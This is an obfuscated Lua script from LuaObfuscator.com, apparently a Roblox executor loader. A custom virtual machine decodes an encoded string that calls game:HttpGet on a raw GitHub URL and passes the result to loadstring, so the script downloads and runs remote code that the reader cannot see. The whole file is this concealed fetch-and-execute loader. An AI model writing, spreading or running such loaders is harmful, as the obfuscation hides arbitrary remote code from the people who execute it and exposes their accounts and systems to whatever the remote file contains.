--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v88=v2(v0(v30,16));if v19 then local v108=v5(v88,v19);v19=nil;return v108;else return v88;end end end);local function v20(v31,v32,v33) if v33 then local v89=(v31/((5 -3)^(v32-(2 -1))))%(((1 + 2) -1)^(((v33-(2 -1)) -(v32-1)) + 1)) ;return v89-(v89%(620 -(555 + 64))) ;else local v90=0;local v91;while true do if (v90==((1808 -(282 + 595)) -(857 + 74))) then v91=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v91 + v91))>=v91) and 1) or (0 + 0) ;end end end end local function v21() local v34=1637 -(1523 + 114) ;local v35;while true do if (v34==1) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (1 -0) ;v34=1066 -((1338 -(226 + 1044)) + 997) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + 2 ;return (v37 * (373 -(32 + 85))) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (6 -2) + 0 ;return (v41 * ((6830081 -3109648) + 13056783)) + (v40 * (66493 -(892 + 65))) + (v39 * (610 -354)) + v38 ;end local function v24() local v42=0;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(351 -(87 + 263))) then v45=(320 -139) -(67 + 113) ;v46=(v20(v44,1 + 0 ,20) * ((4 -2)^(24 + 8))) + v43 ;v42=7 -(443 -(145 + 293)) ;end if (v42==(955 -(802 + 150))) then if (v47==(0 -0)) then if (v46==(0 -0)) then return v48 * (0 + 0) ;else local v120=997 -(915 + 82) ;while true do if (v120==(0 -0)) then v47=1;v45=0;break;end end end elseif (v47==(1193 + 854)) then return ((v46==(0 -0)) and (v48 * ((1188 -(1069 + 118))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(2237 -1214) ) * (v45 + (v46/((1 + 1)^(92 -40)))) ;end if (v42==(432 -(44 + 386))) then v47=v20(v44,21 + 0 ,(2308 -(998 + 488)) -(368 + 423) );v48=((v20(v44,100 -(22 + 46) )==((16 + 3) -(10 + 8))) and  -1) or (3 -(774 -(201 + 571))) ;v42=445 -(416 + 26) ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=1 + 0 ;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(1138 -(116 + 1022))) then return "";end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v67=4 -3 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99) local v92=(function() return 675 -(534 + 141) ;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do if (v92== #"\\") then if (v93== #",") then v94=(function() return v95()~=0 ;end)();elseif (v93==(1 + 1)) then v94=(function() return v96();end)();elseif (v93~= #"91(") then else v94=(function() return v97();end)();end v98[v99]=(function() return v94;end)();break;end if (v92==(0 + 0)) then local v114=(function() return 0 + 0 ;end)();local v115=(function() return;end)();while true do if (v114~=(0 -0)) then else v115=(function() return 0 -0 ;end)();while true do if (v115~=(0 -0)) then else v93=(function() return v95();end)();v94=(function() return nil;end)();v115=(function() return 2 -1 ;end)();end if (v115~=1) then else v92=(function() return  #"<";end)();break;end end break;end end end end return v92,v93,v94,v95,v96,v97,v98,v99;end;end)();local v53=(function() return function(v100,v101,v102) local v103=(function() return 0;end)();local v104=(function() return;end)();while true do if (v103~=(0 + 0)) then else v104=(function() return 0;end)();while true do if (v104==(736 -(397 + 339))) then local v121=(function() return 396 -(115 + 281) ;end)();while true do if (v121==(438 -(262 + 176))) then v100[v101-#"~" ]=(function() return v102();end)();return v100,v101,v102;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"~",v58 do FlatIdent_104D4,Type,Cons,v21,v24,v25,v59,v69=(function() return v52(FlatIdent_104D4,Type,Cons,v21,v24,v25,v59,v69);end)();end v57[ #"19("]=(function() return v21();end)();for v70= #"~",v23() do local v71=(function() return 0 -0 ;end)();local v72=(function() return;end)();while true do if ((0 -0)~=v71) then else v72=(function() return v21();end)();if (v20(v72, #",", #"|")==(867 -(550 + 317))) then local v116=(function() return 1721 -(345 + 1376) ;end)();local v117=(function() return;end)();local v118=(function() return;end)();local v119=(function() return;end)();while true do if (v116~=(0 -0)) then else local v152=(function() return 688 -(198 + 490) ;end)();local v153=(function() return;end)();while true do if (v152~=(0 -0)) then else v153=(function() return 0 -0 ;end)();while true do if ((4 -3)==v153) then v116=(function() return 2 -1 ;end)();break;end if ((1206 -(696 + 510))==v153) then v117=(function() return v20(v72,3 -1 , #"91(");end)();v118=(function() return v20(v72, #".com",6);end)();v153=(function() return 1;end)();end end break;end end end if (v116~=1) then else local v154=(function() return 0;end)();while true do if (v154~=(1 -0)) then else v116=(function() return 6 -4 ;end)();break;end if (v154==0) then v119=(function() return {v22(),v22(),nil,nil};end)();if (v117==(1262 -(1091 + 171))) then local v175=(function() return 0 -0 ;end)();local v176=(function() return;end)();while true do if (v175~=(0 + 0)) then else v176=(function() return 0 -0 ;end)();while true do if (v176==0) then v119[ #"-19"]=(function() return v22();end)();v119[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v117== #"\\") then v119[ #"asd"]=(function() return v23();end)();elseif (v117==2) then v119[ #"xxx"]=(function() return v23() -((6 -4)^16) ;end)();elseif (v117~= #"asd") then else local v181=(function() return 241 -(187 + 54) ;end)();while true do if (v181==(374 -(123 + 251))) then v119[ #"-19"]=(function() return v23() -((9 -7)^(714 -(208 + 490))) ;end)();v119[ #".dev"]=(function() return v22();end)();break;end end end v154=(function() return 1 + 0 ;end)();end end end if (v116==(6 -3)) then if (v20(v118, #"91(", #"xxx")~= #"[") then else v119[ #"0836"]=(function() return v59[v119[ #"?id="]];end)();end v54[v70]=(function() return v119;end)();break;end if (v116~=(1 + 1)) then else if (v20(v118, #".", #"~")~= #"!") then else v119[838 -(660 + 176) ]=(function() return v59[v119[1 + 1 ]];end)();end if (v20(v118,2 -0 ,204 -(14 + 188) )== #">") then v119[ #"-19"]=(function() return v59[v119[ #"asd"]];end)();end v116=(function() return 1639 -(1373 + 263) ;end)();end end end break;end end end for v73= #">",v23() do v55,v73,v28=(function() return v53(v55,v73,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1001 -(451 + 549) ];local v65=v61[1 + 1 ];local v66=v61[4 -1 ];return function(...) local v74=v64;local v75=v65;local v76=v66;local v77=v27;local v78=1 -0 ;local v79= -(1385 -((1948 -(373 + 829)) + (1369 -(476 + 255))));local v80={};local v81={...};local v82=v12("#",...) -(2 -(1131 -(369 + 761))) ;local v83={};local v84={};for v105=166 -(122 + 44) ,v82 do if ((630<2127) and (v105>=v76)) then v80[v105-v76 ]=v81[v105 + (1 -0) ];else v84[v105]=v81[v105 + ((1 + 0) -0) ];end end local v85=(v82-v76) + (342 -(218 + 123)) ;local v86;local v87;while true do v86=v74[v78];v87=v86[1582 -(1535 + 46) ];if (v87<=(3 + 0)) then if (v87<=(1 + 0)) then if ((v87==(560 -(306 + 254))) or (1938==2514)) then do return;end else v84[v86[1 + 1 ]]={};end elseif ((4255>=55) and (v87>(3 -1))) then local v123;local v124,v125;local v126;local v127;v84[v86[1469 -(899 + 568) ]]={};v78=v78 + 1 + 0 ;v86=v74[v78];v84[v86[4 -2 ]]=v63[v86[11 -8 ]];v78=v78 + 1 ;v86=v74[v78];v84[v86[1214 -(323 + (1614 -725)) ]]=v63[v86[606 -(268 + (634 -299)) ]];v78=v78 + (291 -(60 + 230)) ;v86=v74[v78];v127=v86[574 -(426 + 146) ];v126=v84[v86[(239 -(64 + 174)) + 2 ]];v84[v127 + (1457 -(282 + 1174)) ]=v126;v84[v127]=v126[v86[(60 + 357) -(15 + 398) ]];v78=v78 + (983 -(18 + (1426 -462))) ;v86=v74[v78];v84[v86[(1149 -(144 + 192)) -(569 + 242) ]]=v86[8 -5 ];v78=v78 + (217 -(42 + 174)) + 0 ;v86=v74[v78];v127=v86[852 -(20 + 830) ];v124,v125=v77(v84[v127](v13(v84,v127 + 1 + 0 ,v86[129 -(116 + 10) ])));v79=(v125 + v127) -(1 + 0 + 0) ;v123=(849 + 175) -(300 + 406 + (1822 -(363 + 1141))) ;for v156=v127,v79 do local v157=1251 -(721 + 530) ;while true do if (v157==((2851 -(1183 + 397)) -(945 + 326))) then v123=v123 + (2 -1) ;v84[v156]=v124[v123];break;end end end v78=v78 + 1 + 0 ;v86=v74[v78];v127=v86[702 -(271 + 429) ];v84[v127]=v84[v127](v13(v84,v127 + 1 + (0 -0) ,v79));v78=v78 + (1501 -(1408 + 92)) ;v86=v74[v78];v84[v86[1088 -(338 + 123 + 625) ]]();v78=v78 + (1289 -(743 + 250 + 295)) ;v86=v74[v78];do return;end else v84[v86[1 + 1 ]]=v86[1174 -((2393 -(1913 + 62)) + 753) ];end elseif (v87<=(14 -9)) then if (v87==(381 -(90 + 52 + 235))) then v84[v86[1 + 1 ]]=v63[v86[(2 -1) + 2 ]];else v84[v86[979 -((2486 -(565 + 1368)) + 424) ]]();end elseif (v87<=(10 -4)) then local v147=0 + 0 ;local v148;local v149;local v150;local v151;while true do if (v147==(1 + 0)) then v79=(v150 + v148) -(530 -(406 + 123)) ;v151=0 + 0 ;v147=1 + 1 ;end if (v147==(1769 -((6577 -4828) + 20))) then v148=v86[1 + 1 ];v149,v150=v77(v84[v148](v13(v84,v148 + (1323 -(1249 + 73)) ,v86[2 + 1 ])));v147=1146 -(466 + 679) ;end if ((2999>1156) and (v147==(4 -2))) then for v172=v148,v79 do v151=v151 + (2 -1) ;v84[v172]=v149[v151];end break;end end elseif ((2350>1155) and (v87==((3568 -(1477 + 184)) -(106 + 1794)))) then local v158=v86[755 -(239 + 514) ];local v159=v84[v86[2 + 1 ]];v84[v158 + 1 + 0 ]=v159;v84[v158]=v159[v86[2 + 2 ]];else local v163=v86[5 -(3 -0) ];v84[v163]=v84[v163](v13(v84,v163 + (2 -1) ,v79));end v78=v78 + (115 -(4 + 110)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403433Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B69657462612F4B69657462612F726566732F68656164732F6D61696E2F44636D00094Q00037Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
